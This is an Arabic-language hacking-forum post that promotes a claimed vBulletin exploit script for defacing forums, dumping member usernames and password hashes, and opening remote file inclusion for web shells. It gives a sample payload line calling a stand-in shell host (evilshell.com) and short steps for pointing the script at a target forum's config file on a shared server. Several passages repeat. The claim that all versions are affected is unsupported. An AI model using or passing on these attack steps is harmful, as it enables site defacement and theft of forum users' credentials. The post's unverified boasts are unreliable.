السكربت السحري للمنتديات
صفحة 1 من اصل 1
السكربت السحري للمنتديات
اليوم جبت لكم ثغرة طازجة للمنتديات من نوع vBulletin التي تستخدمها اغلب المواقع
والثغرة من اكتشاف الهاكر العربي المعروف rUn vIrUs
معلومات الثغرة:
البرنامج المصاب : vBulletin
النسخة المصابة : جميع النسخ
الخطر : عالية الخطورة
وظائف الثغرة:
1- تعديل الاندكس للمنتدى الى صفحة الإختراق. (لاصحاب الشهرة)
2- عرض اسماء الاعضاء مع الباسووردتا المشفرة. (للمحللين)
3- عمل ثغرة ريموت فايل انكلود للمنتدى. (الأفضل للشلات)
مثل
كود PHP:
index.php?cmd=http://evilshell.com
والثغرة من اكتشاف الهاكر العربي المعروف rUn vIrUs
معلومات الثغرة:
البرنامج المصاب : vBulletin
النسخة المصابة : جميع النسخ
الخطر : عالية الخطورة
وظائف الثغرة:
1- تعديل الاندكس للمنتدى الى صفحة الإختراق. (لاصحاب الشهرة)
2- عرض اسماء الاعضاء مع الباسووردتا المشفرة. (للمحللين)
3- عمل ثغرة ريموت فايل انكلود للمنتدى. (الأفضل للشلات)
مثل
كود PHP:
index.php?cmd=http://evilshell.com
الشرح:
تعدل في ملف الثغرة في السطر التالي وتكتب مسار المنتدى المراد اختراقة:
كود PHP:
require("/home/site/public_html/vb/includes/config.php")
تبحث عن:
كود PHP:
by Nazy L!unx
كود PHP:
by Nazy L!unx
وتعدله إلى اسمك أو اي شيء لإبراز الإختراق! (لا تعدله خليه على كذا ^_^)
لكي تخترق اي منتدى يجب ان ترفع ملف الثغرة على اي موقع على نفس السيرفر
ولازم يكون open_basedir مسموح على السيرفر
لكي تخترق اي منتدى يجب ان ترفع ملف الثغرة على اي موقع على نفس السيرفر
ولازم يكون open_basedir مسموح على السيرفر
abomehsen- مشرف
- عدد الرسائل : 1165
العمر : 35
تاريخ التسجيل : 22/12/2006
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى